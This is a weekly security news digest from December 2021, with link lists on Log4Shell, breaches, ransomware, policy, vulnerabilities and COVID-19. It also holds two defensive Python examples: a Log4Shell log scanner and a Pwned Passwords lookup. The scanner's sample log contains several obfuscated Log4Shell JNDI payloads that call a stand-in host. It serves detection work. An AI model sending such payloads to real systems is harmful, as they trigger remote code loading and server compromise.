This Week's [in]Security - Issue 247
26 Dec 2021.
Welcome to This Week's [in]Security. Big Hacks: more Log4Shell. New breaches: Azure, Hellmann. New ransomware: terrorism? Inetum. Major outages: AWS. Follow-ups & fall-out: HIBP adds 225M new NCA passwords. Privacy: eye-tracking. Laws & Regs - Canada: digital law, AI. US: tech lawsuits. World: judgements & fines. Standards: NISTIR draft. Defense: fighting scams, browser enhancements. Vulnerabilities: multiple MS, WordPress plugin, VoIP backdoors, 93% of tested networks breachable, IoT honeypot, crypto research. Cybercrime: Trends: top 5 scams, Android, PowerPoint. Nation states: NSO Group, Zoho. Crime & enforcement: crypto returned, SEC filings. Other risks: 5G & aircraft, juice jacking, human behavior. Innovations & Inventions: quantum, lickable screens. Health, Safety & Environment. Covid-19: spread, curves, waves, and variants; response; changing restrictions; treatments; rapid tests; immunity; new vaccine type; things learned; Omicron; Covid ugly; Covid compliance. And more.
Breaches / Ransomware / Leaks
Covering breaches, leaks, data exposures, ransomware (as potential breach), and their fallout.
-
Major incidents:
- CISA, FBI and NSA Publish Joint Advisory and Scanner for Log4j Vulnerabilities https://thehackernews.com/2021/12/cisa-fbi-and-nsa-publish-joint-advisory.html
- CISA releases Apache Log4j scanner to find vulnerable apps https://www.bleepingcomputer.com/news/security/cisa-releases-apache-log4j-scanner-to-find-vulnerable-apps/
- Google Finds 35,863 Java Packages Using Defective Log4j https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
- Java Code Repository Riddled with Hidden Log4j Bugs; Here's Where to Look https://threatpost.com/java-supply-chain-log4j-bug/177211/
- Examining Log4j Vulnerabilities in Connected Cars and Charging Stations https://www.trendmicro.com/en_us/research/21/l/examining-log4j-vulnerabilities-in-connected-cars.html
- 6 Ways to Quickly Detect a Log4Shell Exploit in Your Environment https://blog.qualys.com/vulnerabilities-threat-research/2021/12/19/5-ways-to-quickly-detect-a-log4shell-exploit-in-your-environment
- New Options Profiles for Log4Shell Detection https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/new-options-profiles-for-log4shell-detection
- Conti Ransomware Gang Has Full Log4Shell Attack Chain https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/
- Log4j vulnerability now used to install Dridex banking malware https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/
- Log4j Makes Waves In The US Financial Industry https://packetstormsecurity.com/news/view/32942/Log4j-Makes-Waves-In-The-US-Financial-Industry.html
- Alibaba Cloud slapped by Chinese ministry for mishandling Log4j https://www.theregister.com/2021/12/23/alibaba_cloud_in_trouble_with/
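Several of the Log4Shell items above (the CISA scanner, the Qualys detection notes, the Conti and Dridex reports) come down to the same first step: finding `${jndi:...}` lookups in inbound request data, including the nested-lookup and percent-encoded forms attackers used to slip past naive string matching. The following is an added example written for this digest, not code from CISA, Qualys or any linked article. It de-obfuscates the common `${lower:x}`, `${::-x}` and `${env:X:-x}` tricks innermost-first, then reports the resulting JNDI URL per log line. The log lines in `SAMPLE_LOG` are constructed for the example (203.0.113.7 is documentation address space), and the function names are this example's own.

```python
"""Added example: flag Log4Shell-style JNDI lookups in web-server log lines.

Not code from any of the linked articles or tools.  SAMPLE_LOG is constructed
for this example; 203.0.113.7 is documentation address space, not a real host.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

# Innermost ${...} lookup, i.e. one whose body contains no further "${" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup for any of the protocols Log4j 2.x will try to resolve.
_JNDI = re.compile(r"jndi:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|https?):", re.IGNORECASE)
# Same, extended to the end of the URL so the result is a usable indicator.
_JNDI_URL = re.compile(r"jndi:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|https?):[^\s\"'}]*", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Reduce one lookup body to the text Log4j would substitute for it."""
    if _JNDI.search(body):
        return body                      # already a bare jndi: lookup, keep it whole
    m = re.fullmatch(r"(?:lower|upper)\s*:(.*)", body, re.IGNORECASE | re.DOTALL)
    if m:
        return m.group(1)                # ${lower:j} -> j  (case is ignored later)
    if ":-" in body:
        return body.split(":-", 1)[1]    # ${env:NOPE:-j} or ${::-j} -> the default, j
    return body                          # unknown lookup: keep the body so nothing is hidden


def normalize(text: str, max_rounds: int = 32) -> str:
    """Undo percent-encoding and nested-lookup obfuscation, innermost first."""
    for _ in range(2):                   # single or double percent-encoding
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):          # each round strips at least one ${...} level
        reduced = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if reduced == text:
            break
        text = reduced
    return text


def find_jndi(line: str) -> str:
    """Return the de-obfuscated JNDI URL found in `line`, or '' if there is none."""
    m = _JNDI_URL.search(normalize(line))
    return m.group(0) if m else ""


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, indicator) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        indicator = find_jndi(line)
        if indicator:
            hits.append((n, indicator))
    return hits


# Constructed sample: Apache combined-format lines with one benign request, four
# payload variants (plain, ${lower:} nesting, percent-encoded ${::-} default,
# ${env:...:-} default) and one harmless lookup-looking path.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [20/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [20/Dec/2021:10:01:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://203.0.113.7/b}"',
    '10.0.0.9 - - [20/Dec/2021:10:01:05 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F203.0.113.7%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [20/Dec/2021:10:01:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://203.0.113.7/d}"',
    '10.0.0.3 - - [20/Dec/2021:10:01:07 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, indicator in scan_log(SAMPLE_LOG):
        print(f"line {n}: {indicator}")
```

A hit here means an attempt was logged, not that exploitation succeeded; pair it with egress monitoring for unexpected LDAP/RMI connections from Java hosts and with an inventory scan such as the CISA tool, since the inbound string only tells you who was probed. The normalizer covers the obfuscations that circulated widely in December 2021 but is not exhaustive; treat it as one detector among several rather than the whole answer.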
-
New Breaches:
- Four years: that's how long Azure's App Service had a source code leak bug https://www.theregister.com/2021/12/24/azure_app_service_not_legit_source_code_leak/
- Ransomware Operators Leak Data Stolen From Logistics Giant Hellmann https://www.securityweek.com/ransomware-operators-leak-data-stolen-logistics-giant-hellmann
- Massive data breach exposes wage and personal info of more than 637,000 Albanian residents https://www.databreaches.net/massive-data-breach-exposes-wage-and-personal-info-of-more-than-637000-albanian-residents/
- Computer containing vaccine data stolen in Brussels https://www.databreaches.net/computer-containing-vaccine-data-stolen-in-brussels/
-
New Ransomware and "Incidents":
- Ransomware May Be Terrorism, But Security Pros Differ Markedly in How to Deal With It https://www.digitaltransactions.net/ransomware-may-be-terrorism-but-security-pros-differ-markedly-in-how-to-deal-with-it/
- New Ransomware Variants Flourish Amid Law Enforcement Actions https://thehackernews.com/2021/12/new-ransomware-variants-flourish-amid.html
- Global IT services provider Inetum hit by ransomware attack https://www.bleepingcomputer.com/news/security/global-it-services-provider-inetum-hit-by-ransomware-attack/
- Evil Corp Is Dodging Sanctions By Dressing Up As REvil https://packetstormsecurity.com/news/view/32933/Evil-Corp-Is-Dodging-Sanctions-By-Dressing-Up-As-REvil.html
-
Major outages/downs:
- AWS suffers third outage of the month https://arstechnica.com/information-technology/2021/12/aws-suffers-third-outage-of-the-month/
-
Follow-ups and fall-out:
- UK govt shares 585 million passwords with Have I Been Pwned https://www.bleepingcomputer.com/news/security/uk-govt-shares-585-million-passwords-with-have-i-been-pwned/
- Open Source Pwned Passwords with FBI Feed and 225M New NCA Passwords is Now Live! https://www.troyhunt.com/open-source-pwned-passwords-with-fbi-feed-and-225m-new-nca-passwords-is-now-live/
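The two Have I Been Pwned items above are only useful in practice if a service can check new or changed passwords against the corpus without sending the password anywhere. The Pwned Passwords range API does that with k-anonymity: the client sends the first five hex characters of the password's SHA-1 and compares the rest locally against the returned `SUFFIX:COUNT` list. The code below is an added example for this digest, not code from Have I Been Pwned or Troy Hunt. The API URL, the SHA-1 prefix length and the `Add-Padding` header are the documented interface; `SAMPLE_RANGE_RESPONSE` and its counts are constructed so the check runs offline, and the function names are this example's own.

```python
"""Added example: k-anonymity lookup against the Pwned Passwords range API.

Not code from Have I Been Pwned.  The API shape (SHA-1, 5-hex-char prefix,
"SUFFIX:COUNT" lines) is the documented one; SAMPLE_RANGE_RESPONSE and its
counts are constructed for this example.
"""
import hashlib
import urllib.request
from typing import Dict, Tuple

API = "https://api.pwnedpasswords.com/range/"


def split_sha1(password: str) -> Tuple[str, str]:
    """SHA-1 the password and split it into the 5-char prefix that is sent to
    the service and the 35-char suffix that never leaves this machine."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def parse_range(body: str) -> Dict[str, int]:
    """Parse 'SUFFIX:COUNT' lines; padding entries (count 0) are dropped."""
    counts: Dict[str, int] = {}
    for raw in body.splitlines():
        line = raw.strip()
        if not line or ":" not in line:
            continue
        suffix, _, count = line.partition(":")
        n = int(count)
        if n > 0:
            counts[suffix.upper()] = n
    return counts


def pwned_count(password: str, range_body: str) -> int:
    """How many times the password appears in the corpus (0 = not found)."""
    _, suffix = split_sha1(password)
    return parse_range(range_body).get(suffix, 0)


def fetch_range(prefix: str, timeout: float = 5.0) -> str:
    """Live query (needs network).  Only the 5-char prefix is sent; Add-Padding
    asks the service to pad the response so its size does not reveal the prefix."""
    req = urllib.request.Request(
        API + prefix,
        headers={"Add-Padding": "true", "User-Agent": "pwned-range-example"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8")


def check_live(password: str) -> int:
    """End-to-end check against the real service (not exercised offline)."""
    prefix, _ = split_sha1(password)
    return pwned_count(password, fetch_range(prefix))


# Constructed stand-in for the response to GET /range/5BAA6.  The third suffix
# is the real remainder of SHA-1("password"); the other suffixes and all counts
# are made up, and the last line shows a padding entry.
SAMPLE_RANGE_RESPONSE = """\
1D2DA4053E34E76F6576ED1DA63134B5E2A:2
1D72CD07550416C216D8AD296BF5C0AE8E0:10
1E4C9B93F3F0682250B6CF8331B7EE68FD8:3861493
1E6F48B56D5A05B96C1F50F9B7A9E2A9D5B:0
"""

if __name__ == "__main__":
    print(split_sha1("password"))                                 # prefix, suffix
    print(pwned_count("password", SAMPLE_RANGE_RESPONSE))         # found
    print(pwned_count("a long unique passphrase", SAMPLE_RANGE_RESPONSE))
```

Wire this into password-change and registration flows and reject (or at least warn on) any non-zero count; a count of zero means only that the password is not in the corpus, not that it is strong, so keep the length and rate-limit controls you already have. The suffix comparison happens locally, so a compromised or logging intermediary learns only that the client asked about one of roughly a thousand hashes sharing that prefix.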
Privacy
Articles about privacy related news, risks, and trends.
- Eye Tracking in Retail Shopping Must Benefit the Consumer https://www.pymnts.com/news/retail/2021/eye-tracking-in-retail-shopping-must-benefit-the-consumer/
- Privacy-focused search engine DuckDuckGo grew by 46% in 2021 https://www.bleepingcomputer.com/news/technology/privacy-focused-search-engine-duckduckgo-grew-by-46-percent-in-2021/
Laws, Regulations, Platforms, Standards, and Public Policy
News about laws, regulations, platform rules, and standards affecting security, privacy, technology, and public interest.
-
Canada:
- The Law Bytes Podcast, Episode 113: The Year in Canadian Digital Law and Policy https://www.michaelgeist.ca/2021/12/law-bytes-podcast-episode-113/
- Submission to the Toronto Police Services Board's Use of New Artificial Intelligence Technologies Policy https://citizenlab.ca/2021/12/submission-to-the-toronto-police-services-boards-use-of-new-artificial-intelligence-technologies-policy/
-
US:
- Phishing victim can't claim $5 million loss for money it never 'held' https://www.databreaches.net/phishing-victim-cant-claim-5-million-loss-for-money-it-never-held/
- Meta sues people behind Facebook and Instagram phishing https://www.bleepingcomputer.com/news/security/meta-sues-people-behind-facebook-and-instagram-phishing/
- TikTok sued by former content moderator for allegedly failing to protect her mental health https://www.theverge.com/2021/12/24/22852817/tiktok-content-moderation-lawsuit-candie-frazier
-
World:
- Pain and Suffering for a Data Breach? German Court Issues First Decision of Its Kind in Europe. https://www.databreaches.net/pain-and-suffering-for-a-data-breach-german-court-issues-first-decision-of-its-kind-in-europe/
- If Your Disclosure of a Data Breach Was “Late,” You May Have to Litigate https://www.databreaches.net/if-your-disclosure-of-a-data-breach-was-late-you-may-have-to-litigate/
- Google faces nearly $100 million fine in Russia over failure to delete banned content https://www.theverge.com/2021/12/24/22852827/google-100-million-fine-russia-banned-content-big-tech-regulation
-
Standards News:
- NICE Framework Competencies: 2nd Draft NISTIR 8355 Available for Comment through January 31 https://csrc.nist.gov/publications/detail/nistir/8355/draft
Defense / Techniques / Solutions
Covering developments and opportunities that may help improve security.
- T-Mobile says it blocked 21 billion scam calls this year https://www.bleepingcomputer.com/news/security/t-mobile-says-it-blocked-21-billion-scam-calls-this-year/
- Windows 10 21H2 adds ransomware protection to security baseline https://www.bleepingcomputer.com/news/microsoft/windows-10-21h2-adds-ransomware-protection-to-security-baseline/
- Meta cracks down on phishing scams that use its trademarks https://www.theverge.com/2021/12/20/22846952/meta-lawsuit-phishing-attacks
- DuckDuckGo is working on a privacy-focused desktop browser https://www.theverge.com/2021/12/21/22848133/duckduckgo-browser-pc-mac-beta-privacy-default-settings
- Opera browser working on clipboard anti-hijacking feature https://www.bleepingcomputer.com/news/security/opera-browser-working-on-clipboard-anti-hijacking-feature/
Bugs / Design Flaws / Vulnerabilities / Research
Articles about newly discovered vulnerabilities and research.
Other Vulnerabilities:
- A Year in Microsoft Bugs: The Most Critical, Overlooked & Hard to Patch https://www.darkreading.com/threat-intelligence/a-year-in-microsoft-bugs-the-most-critical-overlooked-and-hard-to-patch
- Microsoft Office Patch Bypassed for Malware Distribution in Apparent 'Dry Run' https://www.securityweek.com/microsoft-office-patch-bypassed-malware-distribution-apparent-dry-run
- Microsoft Teams bug allowing phishing unpatched since March https://www.bleepingcomputer.com/news/security/microsoft-teams-bug-allowing-phishing-unpatched-since-march/
- Microsoft Urges Customers to Patch Recent Active Directory Vulnerabilities https://www.securityweek.com/microsoft-urges-customers-patch-recent-active-directory-vulnerabilities
- Microsoft warns of easy Windows domain takeover via Active Directory bugs https://www.bleepingcomputer.com/news/microsoft/microsoft-warns-of-easy-windows-domain-takeover-via-active-directory-bugs/
- MS Teams link preview: 1 feature, 4 vulnerabilities https://positive.security/blog/ms-teams-1-feature-4-vulns
- 800K WordPress sites still impacted by critical SEO plugin flaw https://www.bleepingcomputer.com/news/security/800k-wordpress-sites-still-impacted-by-critical-seo-plugin-flaw/
- Secret Backdoors Found in German-made Auerswald VoIP System https://thehackernews.com/2021/12/secret-backdoors-found-in-german-made.html
- Blackmagic fixes critical DaVinci Resolve code execution flaws https://www.bleepingcomputer.com/news/security/blackmagic-fixes-critical-davinci-resolve-code-execution-flaws/
- 93% of Tested Networks Vulnerable to Breach, Pen Testers Find https://www.darkreading.com/attacks-breaches/93-of-tested-networks-vulnerable-to-breach-pentesters-find
- Honeypot experiment reveals what hackers want from IoT devices https://www.bleepingcomputer.com/news/security/honeypot-experiment-reveals-what-hackers-want-from-iot-devices/
- Vulnerability Spotlight: Vulnerabilities in metal detector peripheral could allow attackers to manipulate security devices http://blog.talosintelligence.com/2021/12/vuln-spotlight-garrett-metal-detector.html
- This security researcher fooled an at-home COVID-19 test using a Bluetooth hack https://www.theverge.com/2021/12/21/22847222/ellume-at-home-covid-test-bluetooth-android-certification
- Disclosing Shamir's Secret Sharing vulnerabilities and announcing ZKDocs https://blog.trailofbits.com/2021/12/21/disclosing-shamirs-secret-sharing-vulnerabilities-and-announcing-zkdocs/
- Traceable PRFs: Full Collusion Resistance and Active Security, by Sarasij Maitra and David J. Wu https://eprint.iacr.org/2021/1675
- Multi-Issuer Anonymous Credentials Without a Root Authority, by Kaoutar Elkhiyaoui and Angelo De Caro and Elli Androulaki https://eprint.iacr.org/2021/1669
Hacking / Malware / Cybercrime / Exploitation
News covering active trends, alerts, events.
-
Trends, Alerts, and Events (other than major breaches):
- These are the top five scams Canadians fell for in 2021 https://toronto.ctvnews.ca/these-are-the-top-five-scams-canadians-fell-for-in-2021-1.5718580
- Threat actors steal $80 million per month with fake giveaways, surveys https://www.bleepingcomputer.com/news/security/threat-actors-steal-80-million-per-month-with-fake-giveaways-surveys/
- Over 500,000 Android Users Downloaded a New Joker Malware App from Play Store https://thehackernews.com/2021/12/over-500000-android-users-downloaded.html
- PowerPoint attachments, Agent Tesla and code reuse in malware, (Mon, Dec 20th) https://isc.sans.edu/diary/rss/28154
- Stealthy BLISTER malware slips in unnoticed on Windows systems https://www.bleepingcomputer.com/news/security/stealthy-blister-malware-slips-in-unnoticed-on-windows-systems/
- Dridex malware trolls employees with fake job termination emails https://www.bleepingcomputer.com/news/security/dridex-malware-trolls-employees-with-fake-job-termination-emails/
- FBI: Hackers Are Actively Exploiting This Flaw On ManageEngine Desktop Central Servers https://packetstormsecurity.com/news/view/32935/FBI-Hackers-Are-Actively-Exploiting-This-Flaw-On-ManageEngine-Desktop-Central-Servers.html
- Tropic Trooper Cyber Espionage Hackers Targeting Transportation Sector https://thehackernews.com/2021/12/tropic-trooper-cyber-espionage-hackers.html
- De: Counterfeiters want to hijack the pharmacists' DAV portal https://www.databreaches.net/de-counterfeiters-want-to-hijack-the-pharmacists-dav-portal/
-
Nation State Actors:
- AP Exclusive: Polish Opposition Duo Hacked With NSO Spyware https://www.securityweek.com/ap-exclusive-polish-opposition-duo-hacked-nso-spyware
- More on NSO Group and Cytrox: Two Cyberweapons Arms Manufacturers https://www.schneier.com/blog/archives/2021/12/more-on-nso-group-and-cytrox-two-cyberweapons-arms-manufacturers.html
- The secret Uganda deal that has brought NSO to the brink of collapse https://arstechnica.com/features/2021/12/the-secret-uganda-deal-that-has-brought-nso-to-the-brink-of-collapse/
- FBI: State hackers exploiting new Zoho zero-day since October https://www.bleepingcomputer.com/news/security/fbi-state-hackers-exploiting-new-zoho-zero-day-since-october/
-
Crime & Arrests, etc.:
- Stolen Bitcoins Returned https://www.schneier.com/blog/archives/2021/12/stolen-bitcoins-returned.html
- Scammers Stole $7.7 Billion In Crypto In 2021 https://packetstormsecurity.com/news/view/32931/Scammers-Stole-7.7-Billion-In-Crypto-In-2021.html
- Russian hackers made millions by stealing SEC earning reports https://www.bleepingcomputer.com/news/security/russian-hackers-made-millions-by-stealing-sec-earning-reports/
- Rideshare account hacker faces up to 22 years in prison https://www.bleepingcomputer.com/news/legal/rideshare-account-hacker-faces-up-to-22-years-in-prison/
- Russian Hacker Extradited to US for Trading on Stolen Information https://www.securityweek.com/russian-hacker-extradited-us-trading-stolen-information
Other Security / Risk
Articles covering other types of risks.
- Airbus and Boeing express concerns over 5G interference in US https://www.theguardian.com/science/2021/dec/21/airbus-and-boeing-express-concerns-over-5g-interference-in-us
- Airbnb tightens 'anti-party' rules for rentals as New Year's Eve approaches https://www.theverge.com/2021/12/20/22846414/airbnb-party-night-rentals-new-years-eve-restrictions
- DtSR Episode 480 - Juice Jacking http://podcast.wh1t3rabbit.net/dtsr-episode-480-juice-jacking
- Nearly 50% of People Will Abandon Sites Prohibiting Password Reuse https://www.darkreading.com/risk/nearly-50-of-people-will-abandon-sites-prohibiting-password-reuse
- Scientists Have Identified The Driving Force Behind Your Darkest Impulses https://www.sciencealert.com/scientists-have-identified-the-driving-force-behind-your-darkest-impulses
- How COVID Is Changing the Study of Human Behavior https://www.scientificamerican.com/article/how-covid-is-changing-the-study-of-human-behavior/
- Elon Musk: metaverse isn't 'compelling' and Web3 'more marketing than reality' https://www.theverge.com/2021/12/22/22849717/elon-musk-metaverse-web3-more-marketing-than-reality
- Regina police use conducted energy weapon during break-and-enter arrest https://globalnews.ca/news/8471057/regina-police-cew-taser-arrest-break-and-enter/
- The Absurdity of Renting a Car Will No Longer Be Tolerated https://www.theatlantic.com/technology/archive/2021/12/car-rental-shortage-covid/621068/
- A new “epitope” for universal influenza vaccines https://scienmag.com/a-new-epitope-for-universal-influenza-vaccines/
- Could Omicron have been predicted? First-of-its-kind technology possibly foresees variants https://globalnews.ca/news/8463507/technology-predict-covid-19-virus-mutants-omicron/
-
Innovations & Inventions:
- A-list candidate for fault-free quantum computing delivers surprise https://phys.org/news/2021-12-a-list-candidate-fault-free-quantum.html
- Take a look at this delicious lickable screen to see the future we knew was coming https://www.theverge.com/2021/12/23/22851585/lick-taste-the-tv-screen-snozzberries-flavor-chemicals-menu
- Tsunamis' magnetic fields are detectable before sea level change https://scienmag.com/tsunamis-magnetic-fields-are-detectable-before-sea-level-change/
-
Health, Safety & Environment:
- Tesla Agrees to Stop Letting Drivers Play Video Games in Moving Cars https://www.nytimes.com/2021/12/23/business/tesla-video-games.html
- Ontario woman left shocked after washing machine door explodes https://toronto.ctvnews.ca/ontario-woman-left-shocked-after-washing-machine-door-explodes-1.5714652
- Love it or hate it, wind chill is real. We break down 5 myths https://www.cbc.ca/news/canada/edmonton/love-it-or-hate-it-wind-chill-is-real-we-break-down-5-myths-1.6285040
- How a great white shark altered an N.S. underwater researcher's diving plans for 2022 https://halifax.citynews.ca/local-news/how-a-great-white-shark-altered-an-ns-underwater-researchers-diving-plans-for-2022-4899459
- The Next Disaster Coming to the Great Plains https://www.theatlantic.com/ideas/archive/2021/12/kansas-aquifer-ogallala-water-crisis-drought/621007/
COVID-19 Updates
COVID related articles. We have been following coronavirus risks since https://controlgap.com/blog/this-weeks-insecurity-issue-147.
-
The spread, curves, spikes, waves, reinfection, and variant strains:
- France reports more than 100,000 COVID-19 cases on Christmas Day https://globalnews.ca/news/8474497/france-covid-cases-record-dec-25/
- Omicron now dominant COVID-19 variant in U.S., makes up 73% of cases https://globalnews.ca/news/8464684/covid-19-omicron-variant-us-dominant/
- Ontario reports record 10,412 new COVID-19 cases https://toronto.ctvnews.ca/ontario-reports-record-10-412-new-covid-19-cases-1.5719831
- True number of Ontario COVID cases likely much higher than what's being reported, experts say https://globalnews.ca/news/8471195/true-number-of-ontario-covid-cases-likely-much-higher-experts-say/
- Quebec breaks record for highest daily provincial COVID-19 case count in Canada https://globalnews.ca/news/8465454/quebec-covid-19-dec-21-2021/
- N.S. sets another daily COVID-19 case record with almost 700 https://globalnews.ca/news/8471395/covid-19-halifax-ns-dec-23/
- South Africa's drop in daily new COVID-19 cases suggest its Omicron peak may have passed, experts say https://www.businessinsider.com/south-africa-coronavirus-cases-drop-suggest-omicron-peak-passed-experts-2021-12
-
Guidance, Response, and Recovery:
- The COVID Externalities Have Changed https://www.theatlantic.com/ideas/archive/2021/12/covid-restrictions-2021-omicron-externalities/621076/
- PCR tests now required upon return to Canada for any length of travel amid Omicron https://globalnews.ca/news/8465299/travel-pcr-test-canada-omicron-in-effect/
- P.E.I. joins Newfoundland and Labrador in setting isolation period for visitors https://globalnews.ca/news/8465947/pei-nl-covid-19-isolation-visitors/
- Home for the holidays: How to navigate vaccinated and unvaccinated gatherings this year https://toronto.ctvnews.ca/home-for-the-holidays-how-to-navigate-vaccinated-and-unvaccinated-gatherings-this-year-1.5715131
- A Royal Caribbean cruise ship was denied entry into Curacao and Aruba after at least 55 people tested positive for COVID-19 https://www.businessinsider.com/royal-caribbean-cruise-denied-entry-curacao-aruba-covid-19-cases-2021-12
- Requirement for adults to wear masks in schools has major impact on Covid-19 transmissions, study finds https://scienmag.com/requirement-for-adults-to-wear-masks-in-schools-has-major-impact-on-covid-19-transmissions-study-finds/
-
Treatments, Testing, Triage, Trials, and things we Learned:
- mRNA vaccines highly effective at preventing death from COVID-19, less effective at preventing infection https://scienmag.com/mrna-vaccines-highly-effective-at-preventing-death-from-covid-19-less-effective-at-preventing-infection/
- FDA authorizes second COVID-19 antiviral pill https://www.theverge.com/2021/12/23/22851632/fda-covid-antiviral-authorization-merck-pfizer
- Ontario becomes the first province to list fluvoxamine as a COVID-19 treatment to consider https://www.ctvnews.ca/health/coronavirus/ontario-becomes-the-first-province-to-list-fluvoxamine-as-a-covid-19-treatment-to-consider-1.5717489
- Rapid COVID-19 tests: When to take one, and what to do if it's positive https://globalnews.ca/news/8463521/rapid-covid-19-test-omicron-guide/
- The Atlantic Daily: What Rapid Tests Miss https://www.theatlantic.com/newsletters/archive/2021/12/how-to-use-rapid-tests/621086/
-
Immunity and Vaccinations:
- Western University researchers developing rVSV COVID-19 vaccine https://globalnews.ca/news/8465373/western-university-covid-19-vaccine-development/
Things we learned:
- Omicron carries less risk of hospitalization vs. Delta, study suggests https://globalnews.ca/news/8468230/omicron-hospitalization-risk-study/
- UBC scientists reveal world's first molecular-level analysis of Omicron variant's spike protein https://globalnews.ca/news/8469325/ubc-scientists-omicron-molecular-analysis/
- First “variant of concern” evolved to evade immune system https://scienmag.com/first-variant-of-concern-evolved-to-evade-immune-system/
-
More of the good, the bad, and the ugly:
- Ontario says it will 'track down' and fine those reselling COVID-19 rapid antigen test kits for unfair prices https://toronto.ctvnews.ca/ontario-says-it-will-track-down-and-fine-those-reselling-covid-19-rapid-antigen-test-kits-for-unfair-prices-1.5715743
-
Masks, anti-maskers, distancing, compliance, and repercussions:
- Your cloth mask is not good enough protection against Omicron, according to an expert https://www.businessinsider.com/cloth-masks-are-not-good-enough-protection-against-omicron-expert-2021-12
Off-Topic / Science & Tech / Lighter Side
A variety of scientific, technical, historical, and more light-hearted news.
- Pair of massive machines just arrived in Toronto to carve out another transit line https://www.blogto.com/city/2021/12/pair-massive-machines-arrived-toronto-transit-line/
- You Have No Idea How Hard It Is to Get a Hamster Drunk https://www.theatlantic.com/science/archive/2021/12/alcohol-consumption-hamster-drunk/621125/
- Asteroid Ryugu contains darkest material in the known solar system https://www.independent.co.uk/space/asteroid-ryugu-dark-material-solar-system-b1979966.html
- Astronomers discover largest group of 'rogue planets' yet https://www.theverge.com/2021/12/23/22851798/planets-space-rogue-stars-telescope
- The James Webb Space Telescope launched successfully https://www.universetoday.com/153813/jwst-is-on-its-way/